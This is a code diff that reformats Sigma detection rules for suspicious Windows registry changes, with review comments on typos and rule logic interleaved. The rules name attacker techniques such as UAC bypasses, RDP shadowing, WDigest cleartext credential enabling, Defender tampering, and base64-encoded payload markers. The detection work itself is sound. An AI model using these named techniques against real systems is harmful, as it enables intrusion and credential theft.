b/sigma/builtin/registry/registry_set/registry_set_susp_service_installed.yml index 9ffc58bfd..d4547c9d1 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_service_installed.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_service_installed.yml 
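Review bot: The re-indented `NewValue|contains` list carries `:\Users\Desktop\`, which only matches a path with a folder literally named Desktop directly under the drive's Users directory; a per-user desktop sits under `:\Users\<name>\Desktop\`, so this entry looks like it was meant to be a bare `\Desktop\` substring or is dead. Worth a comment stating which is intended, e.g. `- :\Users\Desktop\ # intentionally literal; per-user desktops are covered elsewhere` or replacing it accordingly. This is pre-existing logic the indentation change merely touches, so the point is raised for follow-up rather than as a regression.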
@@ -1,13 +1,9 @@ title: Suspicious Service Installed id: f2485272-a156-4773-82d7-1d178bc4905b status: test -description: 'Detects installation of NalDrv or PROCEXP152 services via registry-keys - to non-system32 folders. - - Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), - which uses KDU (https://github.com/hfiref0x/KDU) - - ' +description: | + Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. + Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) references: - https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ author: xknow (@xknow_infosec), xorxes (@xor_xes) @@ -29,6 +25,7 @@ detection: - \REGISTRY\MACHINE\System\CurrentControlSet\Services\PROCEXP152\ImagePath filter: ProcessName|endswith: + # Please add the full paths that you use in your environment to tighten the rule - \procexp64.exe - \procexp.exe - \procmon64.exe @@ -38,8 +35,6 @@ detection: NewValue|contains: \WINDOWS\system32\Drivers\PROCEXP152.SYS condition: registry_set and (selection and not filter) falsepositives: - - Other legimate tools using this service names and drivers. Note - clever attackers - may easily bypass this detection by just renaming the services. Therefore - just Medium-level and don't rely on it. + - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it. level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_user_shell_folders.yml b/sigma/builtin/registry/registry_set/registry_set_susp_user_shell_folders.yml index 431e25988..de9778b30 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_user_shell_folders.yml 
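Review bot: The joined `falsepositives` entry in the third hunk keeps the typo "legimate" and the number disagreement "this service names"; suggested line: `- Other legitimate tools using these service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it.` The new comment in the `filter` block ("Please add the full paths that you use in your environment to tighten the rule") is sound advice, since `ProcessName|endswith` on a bare image name accepts any binary carrying that name; it could also mention that the filter then needs `ProcessName` (full path) rather than `ProcessName|endswith` to actually tighten.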
+++ b/sigma/builtin/registry/registry_set/registry_set_susp_user_shell_folders.yml @@ -1,8 +1,7 @@ title: Modify User Shell Folders Startup Value id: 9c226817-8dc9-46c2-a58d-66655aafd7dc status: experimental -description: Detect modification of the startup key to a path where a payload could - be stored to be launched during startup +description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup references: - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md author: frack113 @@ -20,8 +19,7 @@ detection: EventID: 4657 Channel: Security selection: - ObjectName|contains: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User - Shell Folders + ObjectName|contains: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ObjectName|endswith: Startup condition: registry_set and selection falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_suspicious_env_variables.yml b/sigma/builtin/registry/registry_set/registry_set_suspicious_env_variables.yml index 4e20df8f1..5d54b9c52 100644 --- a/sigma/builtin/registry/registry_set/registry_set_suspicious_env_variables.yml +++ b/sigma/builtin/registry/registry_set/registry_set_suspicious_env_variables.yml @@ -1,8 +1,7 @@ title: Suspicious Environment Variable Has Been Registered id: 966315ef-c5e1-4767-ba25-fce9c8de3660 status: test -description: Detects the creation of user-specific or system-wide environment variables - via the registry. Which contains suspicious commands and strings +description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings references: - https://infosec.exchange/@sbousseaden/109542254124022664 author: Nasreddine Bencherchali (Nextron Systems) 
@@ -21,39 +20,43 @@ detection: selection_main: ObjectName|contains: \Environment\ selection_details: - - NewValue: - - powershell - - pwsh - - NewValue|contains: - - \AppData\Local\Temp\ - - C:\Users\Public\ - - TVqQAAMAAAAEAAAA - - TVpQAAIAAAAEAA8A - - TVqAAAEAAAAEABAA - - TVoAAAAAAAAAAAAA - - TVpTAQEAAAAEAAAA - - SW52b2tlL - - ludm9rZS - - JbnZva2Ut - - SQBuAHYAbwBrAGUALQ - - kAbgB2AG8AawBlAC0A - - JAG4AdgBvAGsAZQAtA - - NewValue|startswith: - - SUVY - - SQBFAF - - SQBuAH - - cwBhA - - aWV4 - - aQBlA - - R2V0 - - dmFy - - dgBhA - - dXNpbm - - H4sIA - - Y21k - - cABhAH - - Qzpc - - Yzpc + - NewValue: + - powershell + - pwsh + - NewValue|contains: + # Add more suspicious strings in env variables below + - \AppData\Local\Temp\ + - C:\Users\Public\ + # Base64 MZ Header + - TVqQAAMAAAAEAAAA # MZ.......... + - TVpQAAIAAAAEAA8A + - TVqAAAEAAAAEABAA + - TVoAAAAAAAAAAAAA + - TVpTAQEAAAAEAAAA + # Base64 Invoke- (UTF-8) + - SW52b2tlL + - ludm9rZS + - JbnZva2Ut + # Base64 Invoke- (UTF-16LE) + - SQBuAHYAbwBrAGUALQ + - kAbgB2AG8AawBlAC0A + - JAG4AdgBvAGsAZQAtA + - NewValue|startswith: # https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 + - SUVY + - SQBFAF + - SQBuAH + - cwBhA + - aWV4 + - aQBlA + - R2V0 + - dmFy + - dgBhA + - dXNpbm + - H4sIA + - Y21k + - cABhAH + - Qzpc + - Yzpc condition: registry_set and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/registry/registry_set/registry_set_system_lsa_nolmhash.yml b/sigma/builtin/registry/registry_set/registry_set_system_lsa_nolmhash.yml index 0bf1b91dc..31575faac 100644 --- a/sigma/builtin/registry/registry_set/registry_set_system_lsa_nolmhash.yml +++ b/sigma/builtin/registry/registry_set/registry_set_system_lsa_nolmhash.yml 
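Review bot: The new group comments are a clear improvement, but `# Base64 MZ Header` followed by `# MZ..........` on only the first entry leaves the other four MZ strings unexplained, and they do not appear to be alignment shifts of one string (e.g. `TVpQ` decodes with a leading "MZP"), whereas the three `Invoke-` entries per encoding do look like the three base64 phase alignments of the same text. A maintainer would benefit from one comment per group stating which it is, e.g. `# Base64 MZ header variants (different DOS stub bytes)` and `# Base64 "Invoke-" at the three possible alignments`, so that adding a new entry follows the right pattern. This is documentation only; no change to the selection values is proposed.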
@@ -1,16 +1,12 @@ title: Enable LM Hash Storage id: c420410f-c2d8-4010-856b-dffe21866437 related: - - id: 98dedfdd-8333-49d4-9f23-d7018cccae53 - type: similar + - id: 98dedfdd-8333-49d4-9f23-d7018cccae53 # process_creation + type: similar status: experimental -description: 'Detects changes to the "NoLMHash" registry value in order to allow Windows - to store LM Hashes. - - By setting this registry value to "0" (DWORD), Windows will be allowed to store - a LAN manager hash of your password in Active Directory and local SAM databases. - - ' +description: | + Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. + By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. references: - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password diff --git a/sigma/builtin/registry/registry_set/registry_set_taskcache_entry.yml b/sigma/builtin/registry/registry_set/registry_set_taskcache_entry.yml index 5fd997499..b4e026e71 100644 --- a/sigma/builtin/registry/registry_set/registry_set_taskcache_entry.yml +++ b/sigma/builtin/registry/registry_set/registry_set_taskcache_entry.yml @@ -1,8 +1,7 @@ title: Scheduled TaskCache Change by Uncommon Program id: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d status: experimental -description: Monitor the creation of a new key under 'TaskCache' when a new scheduled - task is registered by a process that is not svchost.exe, which is suspicious +description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://labs.f-secure.com/blog/scheduled-task-tampering/ 
@@ -37,8 +36,7 @@ detection: ProcessName|endswith: \ngen.exe ObjectName|contains: - \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129} - - \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET - Framework\.NET Framework NGEN + - \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET Framework\.NET Framework NGEN filter_office_click_to_run: ProcessName: - C:\Program Files\Microsoft Office\root\Integration\Integrator.exe @@ -51,8 +49,7 @@ detection: - C:\Program Files\Dropbox\Update\DropboxUpdate.exe filter_explorer: ProcessName: C:\Windows\explorer.exe - ObjectName|contains: \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\PLA\Server - Manager Performance Monitor\ + ObjectName|contains: \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\PLA\Server Manager Performance Monitor\ filter_system: ProcessName: System condition: registry_set and (selection and not 1 of filter*) diff --git a/sigma/builtin/registry/registry_set/registry_set_telemetry_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_telemetry_persistence.yml index 97b060778..88bbc92ed 100644 --- a/sigma/builtin/registry/registry_set/registry_set_telemetry_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_telemetry_persistence.yml 
@@ -1,22 +1,14 @@ title: Potential Registry Persistence Attempt Via Windows Telemetry id: 73a883d0-0348-4be4-a8d8-51031c2564f8 related: - - id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 - type: obsoletes + - id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 + type: obsoletes status: test -description: 'Detects potential persistence behavior using the windows telemetry registry - key. - - Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety - of commands and perform the actual telemetry collections. - - This binary was created to be easily extensible, and to that end, it relies on - the registry to instruct on which commands to run. - - The problem is, it will run any arbitrary command without restriction of location - or type. - - ' +description: | + Detects potential persistence behavior using the windows telemetry registry key. + Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. + This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. + The problem is, it will run any arbitrary command without restriction of location or type. references: - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ author: Lednyov Alexey, oscd.community, Sreeman @@ -28,8 +20,7 @@ tags: logsource: category: registry_set product: windows - definition: 'Requirements: Sysmon config that monitors \SOFTWARE\Microsoft\Windows - NT\CurrentVersion\AppCompatFlags\TelemetryController subkey of the HKLM hives' + definition: 'Requirements: Sysmon config that monitors \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController subkey of the HKLM hives' detection: registry_set: EventID: 4657 
diff --git a/sigma/builtin/registry/registry_set/registry_set_terminal_server_suspicious.yml b/sigma/builtin/registry/registry_set/registry_set_terminal_server_suspicious.yml
index 958ae0717..e19e59643 100644
--- a/sigma/builtin/registry/registry_set/registry_set_terminal_server_suspicious.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_terminal_server_suspicious.yml
@@ -1,25 +1,21 @@ title: RDP Sensitive Settings Changed to Zero id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b related: - - id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c - type: similar + - id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c + type: similar status: test -description: 'Detects tampering of RDP Terminal Service/Server sensitive settings. - - Such as allowing unauthorized users access to a system via the ''fAllowUnsolicited'' - or enabling RDP via ''fDenyTSConnections'', etc. - - ' +description: | + Detects tampering of RDP Terminal Service/Server sensitive settings. + Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc. references: - - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html - - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ - - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 + - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the "ServiceDll" key + - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique + - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ - - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ - - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services -author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine - Bencherchali + - 
http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contain description for most of the keys mentioned here (check it out if you want more information + - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contain description for most of the keys mentioned here (check it out if you want more information) +author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali date: 2022/09/29 modified: 2022/11/26 tags: @@ -41,7 +37,6 @@ detection: NewValue: DWORD (0x00000000) condition: registry_set and selection falsepositives: - - Some of the keys mentioned here could be modified by an administrator while - setting group policy (it should be investigated either way) + - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_terminal_server_tampering.yml b/sigma/builtin/registry/registry_set/registry_set_terminal_server_tampering.yml index 9f097ae30..00fc58c6e 100644 --- a/sigma/builtin/registry/registry_set/registry_set_terminal_server_tampering.yml +++ b/sigma/builtin/registry/registry_set/registry_set_terminal_server_tampering.yml 
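Review bot: The new inline comments on the references list carry a typo and an unbalanced parenthesis: the woshub.com and twitter.com lines say `# Related to the Shadow RPD technique` where `# Related to the Shadow RDP technique` is meant, and the etutorials.org comment opens a parenthesis that it never closes while the admx.help comment right below does, so both should read `# Contains descriptions for most of the keys mentioned here (check it out if you want more information)`. The same three comments are added with the same defects in the `@@ -1,29 +1,25 @@` hunk of registry_set_terminal_server_tampering.yml and should be corrected there as well. These are comment-only changes with no effect on the detection logic or the rule's references.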
@@ -1,29 +1,25 @@ title: RDP Sensitive Settings Changed id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c related: - - id: 171b67e1-74b4-460e-8d55-b331f3e32d67 - type: obsoletes - - id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3 - type: obsoletes - - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b - type: similar + - id: 171b67e1-74b4-460e-8d55-b331f3e32d67 + type: obsoletes + - id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3 + type: obsoletes + - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b + type: similar status: test -description: 'Detects tampering of RDP Terminal Service/Server sensitive settings. - - Such as allowing unauthorized users access to a system via the ''fAllowUnsolicited'' - or enabling RDP via ''fDenyTSConnections''...etc - - ' +description: | + Detects tampering of RDP Terminal Service/Server sensitive settings. + Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc references: - - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html - - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ - - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 + - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the "ServiceDll" key + - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique + - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ - - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ - - 
https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services -author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine - Bencherchali + - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contain description for most of the keys mentioned here (check it out if you want more information + - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contain description for most of the keys mentioned here (check it out if you want more information) +author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali date: 2022/08/06 modified: 2023/08/17 tags: @@ -43,10 +39,10 @@ detection: - \Control\Terminal Server\ ObjectName|endswith: \Shadow NewValue: - - DWORD (0x00000001) - - DWORD (0x00000002) - - DWORD (0x00000003) - - DWORD (0x00000004) + - DWORD (0x00000001) # Full Control with user’s permission + - DWORD (0x00000002) # Full Control without user’s permission + - DWORD (0x00000003) # View Session with user’s permission + - DWORD (0x00000004) # View Session without user’s permission selection_terminal_services_key: ObjectName|contains: - \Control\Terminal Server\ 
@@ -57,15 +53,14 @@ detection: - \fAllowUnsolicitedFullControl NewValue: DWORD (0x00000001) selection_tamper_only: + # Any changes to these keys should be suspicious and looked at ObjectName|contains: - \services\TermService\Parameters\ServiceDll - \Control\Terminal Server\WinStations\RDP-Tcp\InitialProgram - \Control\Terminal Server\InitialProgram - SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\InitialProgram - condition: registry_set and (selection_shadow or (selection_terminal_services_key - and selection_terminal_services_values) or selection_tamper_only) + condition: registry_set and (selection_shadow or (selection_terminal_services_key and selection_terminal_services_values) or selection_tamper_only) falsepositives: - - Some of the keys mentioned here could be modified by an administrator while - setting group policy (it should be investigated either way) + - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_timeproviders_dllname.yml b/sigma/builtin/registry/registry_set/registry_set_timeproviders_dllname.yml index 01779d888..0e977b0bf 100644 --- a/sigma/builtin/registry/registry_set/registry_set_timeproviders_dllname.yml +++ b/sigma/builtin/registry/registry_set/registry_set_timeproviders_dllname.yml 
@@ -1,14 +1,10 @@ title: Set TimeProviders DllName id: e88a6ddc-74f7-463b-9b26-f69fc0d2ce85 status: experimental -description: 'Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. - +description: | + Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. - - The Windows Time service (W32Time) enables time synchronization across and within - domains. - - ' + The Windows Time service (W32Time) enables time synchronization across and within domains. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml b/sigma/builtin/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml index 3b7f94688..259f68c83 100644 --- a/sigma/builtin/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml +++ b/sigma/builtin/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml @@ -1,8 +1,7 @@ title: Old TLS1.0/TLS1.1 Protocol Version Enabled id: 439957a7-ad86-4a8f-9705-a28131c6821b status: experimental -description: Detects applications or users re-enabling old TLS versions by setting - the "Enabled" value to "1" for the "Protocols" registry key. +description: Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key. references: - https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947 author: Nasreddine Bencherchali (Nextron Systems) 
diff --git a/sigma/builtin/registry/registry_set/registry_set_treatas_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_treatas_persistence.yml index a4745bb60..78152967a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_treatas_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_treatas_persistence.yml @@ -26,8 +26,12 @@ detection: filter_office2: ProcessName: C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe filter_svchost: + # Example of target object by svchost + # TargetObject: HKLM\SOFTWARE\Microsoft\MsixRegistryCompatibility\Package\Microsoft.Paint_11.2208.6.0_x64__8wekyb3d8bbwe\User\SOFTWARE\Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs\(Default) + # TargetObject: HKU\S-1-5-21-1000000000-000000000-000000000-0000_Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs\(Default) ProcessName: C:\Windows\system32\svchost.exe filter_misexec: + # This FP has been seen during installation/updates ProcessName: - C:\Windows\system32\msiexec.exe - C:\Windows\SysWOW64\msiexec.exe diff --git a/sigma/builtin/registry/registry_set/registry_set_turn_on_dev_features.yml b/sigma/builtin/registry/registry_set/registry_set_turn_on_dev_features.yml index 75915d247..73680297d 100644 --- a/sigma/builtin/registry/registry_set/registry_set_turn_on_dev_features.yml +++ b/sigma/builtin/registry/registry_set/registry_set_turn_on_dev_features.yml 
@@ -1,12 +1,10 @@ title: Potential Signing Bypass Via Windows Developer Features - Registry id: b110ebaf-697f-4da1-afd5-b536fa27a2c1 related: - - id: a383dec4-deec-4e6e-913b-ed9249670848 - type: similar + - id: a383dec4-deec-4e6e-913b-ed9249670848 + type: similar status: experimental -description: Detects when the enablement of developer features such as "Developer - Mode" or "Application Sideloading". Which allows the user to install untrusted - packages. +description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. references: - https://twitter.com/malmoeb/status/1560536653709598721 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ diff --git a/sigma/builtin/registry/registry_set/registry_set_uac_bypass_sdclt.yml b/sigma/builtin/registry/registry_set/registry_set_uac_bypass_sdclt.yml index a0f4efabd..ef1788d66 100644 --- a/sigma/builtin/registry/registry_set/registry_set_uac_bypass_sdclt.yml +++ b/sigma/builtin/registry/registry_set/registry_set_uac_bypass_sdclt.yml @@ -1,8 +1,7 @@ title: UAC Bypass via Sdclt id: 5b872a46-3b90-45c1-8419-f675db8053aa status: experimental -description: Detects the pattern of UAC Bypass using registry key manipulation of - sdclt.exe (e.g. UACMe 53) +description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) references: - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ - https://github.com/hfiref0x/UACME diff --git a/sigma/builtin/registry/registry_set/registry_set_uac_bypass_winsat.yml b/sigma/builtin/registry/registry_set/registry_set_uac_bypass_winsat.yml index b51601edc..8d15f851a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_uac_bypass_winsat.yml +++ b/sigma/builtin/registry/registry_set/registry_set_uac_bypass_winsat.yml 
@@ -1,8 +1,7 @@ title: UAC Bypass Abusing Winsat Path Parsing - Registry id: 6597be7b-ac61-4ac8-bef4-d3ec88174853 status: test -description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe - (UACMe 52) +description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_uac_bypass_wmp.yml b/sigma/builtin/registry/registry_set/registry_set_uac_bypass_wmp.yml index 46b3da111..df8044f92 100644 --- a/sigma/builtin/registry/registry_set/registry_set_uac_bypass_wmp.yml +++ b/sigma/builtin/registry/registry_set/registry_set_uac_bypass_wmp.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Windows Media Player - Registry id: 5f9db380-ea57-4d1e-beab-8a2d33397e93 status: test -description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll - (UACMe 32) +description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -20,8 +19,7 @@ detection: EventID: 4657 Channel: Security selection: - ObjectName|endswith: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility - Assistant\Store\C:\Program Files\Windows Media Player\osk.exe + ObjectName|endswith: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Windows Media Player\osk.exe NewValue: Binary Data condition: registry_set and selection falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_vbs_payload_stored.yml b/sigma/builtin/registry/registry_set/registry_set_vbs_payload_stored.yml index 2dbf558c1..e3e6be287 100644 --- a/sigma/builtin/registry/registry_set/registry_set_vbs_payload_stored.yml +++ b/sigma/builtin/registry/registry_set/registry_set_vbs_payload_stored.yml 
@@ -1,8 +1,7 @@ title: VBScript Payload Stored in Registry id: 46490193-1b22-4c29-bdd6-5bf63907216f status: experimental -description: Detects VBScript content stored into registry keys as seen being used - by UNC2452 group +description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_wab_dllpath_reg_change.yml b/sigma/builtin/registry/registry_set/registry_set_wab_dllpath_reg_change.yml index e0215c7c0..899d6d8d5 100644 --- a/sigma/builtin/registry/registry_set/registry_set_wab_dllpath_reg_change.yml +++ b/sigma/builtin/registry/registry_set/registry_set_wab_dllpath_reg_change.yml @@ -1,8 +1,7 @@ title: Execution DLL of Choice Using WAB.EXE id: fc014922-5def-4da9-a0fc-28c973f41bfb status: test -description: This rule detects that the path to the DLL written in the registry is - different from the default one. Launched WAB.exe tries to load the DLL from Registry. +description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry. references: - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml - https://twitter.com/Hexacorn/status/991447379864932352 diff --git a/sigma/builtin/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml b/sigma/builtin/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml index 531e0c7ea..603274988 100644 --- a/sigma/builtin/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml +++ b/sigma/builtin/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml 
@@ -1,9 +1,7 @@ title: Wdigest Enable UseLogonCredential id: d6a9b252-c666-4de6-8806-5561bbbd3bdc status: test -description: Detects potential malicious modification of the property value of UseLogonCredential - from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable - clear-text credentials +description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials references: - https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html - https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649 diff --git a/sigma/builtin/registry/registry_set/registry_set_windows_defender_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_windows_defender_tamper.yml index 6d94d8a68..ea16c72ac 100644 --- a/sigma/builtin/registry/registry_set/registry_set_windows_defender_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_windows_defender_tamper.yml @@ -1,13 +1,12 @@ title: Disable Windows Defender Functionalities Via Registry Keys id: 0eb46774-f1ab-4a74-8238-1155855f2263 related: - - id: a64e4198-c1c8-46a5-bc9c-324c86455fd4 - type: obsoletes - - id: fd115e64-97c7-491f-951c-fc8da7e042fa - type: obsoletes + - id: a64e4198-c1c8-46a5-bc9c-324c86455fd4 + type: obsoletes + - id: fd115e64-97c7-491f-951c-fc8da7e042fa + type: obsoletes status: experimental -description: Detects when attackers or tools disable Windows Defender functionalities - via the Windows registry +description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry references: - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105 
